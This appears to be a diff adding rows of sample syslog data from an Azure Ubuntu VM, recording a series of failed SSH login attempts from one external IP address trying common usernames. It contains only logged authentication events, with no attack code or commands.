+2452,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:41,UbuntuDevEnv,2019-06-28 05:14:40,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2453,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:41,UbuntuDevEnv,2019-06-28 05:14:40,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2454,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:41,UbuntuDevEnv,2019-06-28 05:14:40,auth,UbuntuDevEnv,info,Disconnecting invalid user adm 193.201.224.232 port 34092: Too many authentication failures [preauth],92911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,34092,,
+2455,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:42,UbuntuDevEnv,2019-06-28 05:14:41,auth,UbuntuDevEnv,info,Invalid user adm from 193.201.224.232 port 11212,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2456,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:42,UbuntuDevEnv,2019-06-28 05:14:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2457,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:42,UbuntuDevEnv,2019-06-28 05:14:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2458,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:44,UbuntuDevEnv,2019-06-28 05:14:43,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 11212 ssh2,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2459,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:44,UbuntuDevEnv,2019-06-28 05:14:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2460,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:46,UbuntuDevEnv,2019-06-28 05:14:46,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 11212 ssh2,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2461,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:47,UbuntuDevEnv,2019-06-28 05:14:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2462,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:49,UbuntuDevEnv,2019-06-28 05:14:48,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 11212 ssh2,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2463,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:49,UbuntuDevEnv,2019-06-28 05:14:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2464,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:51,UbuntuDevEnv,2019-06-28 05:14:51,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 11212 ssh2,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:54,UbuntuDevEnv,2019-06-28 05:14:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:56,UbuntuDevEnv,2019-06-28 05:14:55,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 11212 ssh2,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:14:58,UbuntuDevEnv,2019-06-28 05:14:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:00,UbuntuDevEnv,2019-06-28 05:14:59,auth,UbuntuDevEnv,info,Disconnecting invalid user adm 193.201.224.232 port 11212: Too many authentication failures [preauth],92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:00,UbuntuDevEnv,2019-06-28 05:14:59,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:00,UbuntuDevEnv,2019-06-28 05:14:59,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 11212 ssh2,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:00,UbuntuDevEnv,2019-06-28 05:14:59,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:00,UbuntuDevEnv,2019-06-28 05:14:59,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user adm from 193.201.224.232 port 11212 ssh2 [preauth],92964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,11212,,
+2473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:00,UbuntuDevEnv,2019-06-28 05:15:00,auth,UbuntuDevEnv,info,Invalid user adm from 193.201.224.232 port 58194,93031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,58194,,
+2474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:00,UbuntuDevEnv,2019-06-28 05:15:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:00,UbuntuDevEnv,2019-06-28 05:15:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:03,UbuntuDevEnv,2019-06-28 05:15:02,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 58194 ssh2,93031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,58194,,
+2477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:03,UbuntuDevEnv,2019-06-28 05:15:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:05,UbuntuDevEnv,2019-06-28 05:15:05,auth,UbuntuDevEnv,info,Failed password for invalid user adm from 193.201.224.232 port 58194 ssh2,93031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,58194,,
+2479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:06,UbuntuDevEnv,2019-06-28 05:15:05,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:06,UbuntuDevEnv,2019-06-28 05:15:05,auth,UbuntuDevEnv,info,"Disconnecting invalid user adm 193.201.224.232 port 58194: Change of username or service not allowed: (adm,ssh-connection) -> (admin2,ssh-connection) [preauth]",93031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,adm,193.201.224.2,58194,,
+2481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:08,UbuntuDevEnv,2019-06-28 05:15:07,auth,UbuntuDevEnv,info,Invalid user admin2 from 193.201.224.232 port 1489,93096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin2,193.201.224.2,1489,,
+2482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:08,UbuntuDevEnv,2019-06-28 05:15:08,auth,UbuntuDevEnv,info,Failed none for invalid user admin2 from 193.201.224.232 port 1489 ssh2,93096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin2,193.201.224.2,1489,,
+2483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:08,UbuntuDevEnv,2019-06-28 05:15:08,auth,UbuntuDevEnv,info,"Disconnecting invalid user admin2 193.201.224.232 port 1489: Change of username or service not allowed: (admin2,ssh-connection) -> (ADMN,ssh-connection) [preauth]",93096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin2,193.201.224.2,1489,,
+2484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:09,UbuntuDevEnv,2019-06-28 05:15:09,auth,UbuntuDevEnv,info,Bad protocol version identification 'SSH-2.0_CoreLab-1.0' from 193.201.224.232 port 2724,93101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,2724,,
+2485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:13,UbuntuDevEnv,2019-06-28 05:15:12,auth,UbuntuDevEnv,info,Invalid user ADMN from 193.201.224.232 port 10808,93105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ADMN,193.201.224.2,10808,,
+2486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:13,UbuntuDevEnv,2019-06-28 05:15:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:13,UbuntuDevEnv,2019-06-28 05:15:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:15,UbuntuDevEnv,2019-06-28 05:15:15,auth,UbuntuDevEnv,info,Failed password for invalid user ADMN from 193.201.224.232 port 10808 ssh2,93105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ADMN,193.201.224.2,10808,,
+2489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:15,UbuntuDevEnv,2019-06-28 05:15:15,auth,UbuntuDevEnv,info,"Disconnecting invalid user ADMN 193.201.224.232 port 10808: Change of username or service not allowed: (ADMN,ssh-connection) -> (agent,ssh-connection) [preauth]",93105,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ADMN,193.201.224.2,10808,,
+2490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:17,UbuntuDevEnv,2019-06-28 05:15:16,auth,UbuntuDevEnv,info,Invalid user agent from 193.201.224.232 port 36066,93124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,agent,193.201.224.2,36066,,
+2491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:17,UbuntuDevEnv,2019-06-28 05:15:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:17,UbuntuDevEnv,2019-06-28 05:15:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:19,UbuntuDevEnv,2019-06-28 05:15:18,auth,UbuntuDevEnv,info,Failed password for invalid user agent from 193.201.224.232 port 36066 ssh2,93124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,agent,193.201.224.2,36066,,
+2494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:19,UbuntuDevEnv,2019-06-28 05:15:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:21,UbuntuDevEnv,2019-06-28 05:15:21,auth,UbuntuDevEnv,info,Failed password for invalid user agent from 193.201.224.232 port 36066 ssh2,93124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,agent,193.201.224.2,36066,,
+2496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:23,UbuntuDevEnv,2019-06-28 05:15:23,auth,UbuntuDevEnv,info,"Disconnecting invalid user agent 193.201.224.232 port 36066: Change of username or service not allowed: (agent,ssh-connection) -> (am,ssh-connection) [preauth]",93124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,agent,193.201.224.2,36066,,
+2497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:23,UbuntuDevEnv,2019-06-28 05:15:23,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:28,UbuntuDevEnv,2019-06-28 05:15:28,auth,UbuntuDevEnv,info,Invalid user am from 193.201.224.232 port 44126,93163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,am,193.201.224.2,44126,,
+2499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:28,UbuntuDevEnv,2019-06-28 05:15:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:28,UbuntuDevEnv,2019-06-28 05:15:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:30,UbuntuDevEnv,2019-06-28 05:15:30,auth,UbuntuDevEnv,info,Failed password for invalid user am from 193.201.224.232 port 44126 ssh2,93163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,am,193.201.224.2,44126,,
+2502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:36,UbuntuDevEnv,2019-06-28 05:15:35,auth,UbuntuDevEnv,info,"Disconnecting invalid user am 193.201.224.232 port 44126: Change of username or service not allowed: (am,ssh-connection) -> (anonymous,ssh-connection) [preauth]",93163,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,am,193.201.224.2,44126,,
+2503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:37,UbuntuDevEnv,2019-06-28 05:15:37,auth,UbuntuDevEnv,info,Invalid user anonymous from 193.201.224.232 port 19410,93266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anonymous,193.201.224.2,19410,,
+2504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:37,UbuntuDevEnv,2019-06-28 05:15:37,auth,UbuntuDevEnv,info,Failed none for invalid user anonymous from 193.201.224.232 port 19410 ssh2,93266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anonymous,193.201.224.2,19410,,
+2505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:38,UbuntuDevEnv,2019-06-28 05:15:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:38,UbuntuDevEnv,2019-06-28 05:15:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:39,UbuntuDevEnv,2019-06-28 05:15:39,auth,UbuntuDevEnv,info,Failed password for invalid user anonymous from 193.201.224.232 port 19410 ssh2,93266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anonymous,193.201.224.2,19410,,
+2508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:42,UbuntuDevEnv,2019-06-28 05:15:41,auth,UbuntuDevEnv,info,"Disconnecting invalid user anonymous 193.201.224.232 port 19410: Change of username or service not allowed: (anonymous,ssh-connection) -> (apache,ssh-connection) [preauth]",93266,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anonymous,193.201.224.2,19410,,
+2509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:43,UbuntuDevEnv,2019-06-28 05:15:42,auth,UbuntuDevEnv,info,Invalid user apache from 193.201.224.232 port 51822,93285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,193.201.224.2,51822,,
+2510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:15:43,UbuntuDevEnv,2019-06-28 05:15:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
